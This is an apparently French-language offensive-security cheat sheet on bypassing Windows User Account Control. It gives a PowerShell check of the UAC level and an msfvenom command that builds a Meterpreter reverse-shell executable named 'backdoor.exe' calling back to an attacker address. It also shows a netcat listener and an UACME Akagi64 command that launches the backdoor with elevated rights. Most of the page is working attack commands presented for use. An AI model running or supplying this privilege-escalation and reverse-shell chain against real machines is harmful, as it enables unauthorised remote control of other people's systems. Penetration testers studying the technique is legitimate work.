Bypass UAC (User Account Control)

Le Bypass UAC est une technique permettant d'exécuter un programme avec des privilèges élevés (administrateur) sans déclencher l'invite de confirmation de l'User Account Control (UAC) sous Windows. Il exploite souvent des failles ou des comportements légitimes du système pour contourner cette sécurité, par exemple via des DLL hijacking, des tâches planifiées ou l'exploitation de processus système de confiance.

La commande PowerShell suivante permet de vérifier le niveau de UAC sur une machine :

(Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System").ConsentPromptBehaviorAdmin

📌 Résultat possible :

0 ➜ Aucune alerte UAC (100% vulnérable)
1 ➜ UAC silencieux (facile à bypasser)
2 ➜ Mode normal (potentiellement vulnérable)
5 ➜ Mode strict (plus difficile à bypasser)

🔴 Si le résultat est 0 ou 1, il est possible d’escalader sans aucune alerte.

Exploitation via MSFvenom pour Créer un Reverse Shell

Pour créer un reverse shell Windows, utiliser msfvenom :

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.5.2 LPORT=1234 -f exe > backdoor.exe

Ensuite, écouter la connexion entrante sur le port spécifié :

rlwrap nc -nlvp 1234

Lancer le fichier .exe sur la machine cible pour obtenir un accès à distance

GitHub - hfiref0x/UACME: Defeating Windows User Account ControlGitHub

.\Akagi64.exe 23 C:\Temp\backdoor.exe

Mis à jour il y a 8 mois

Ce contenu vous a-t-il été utile ?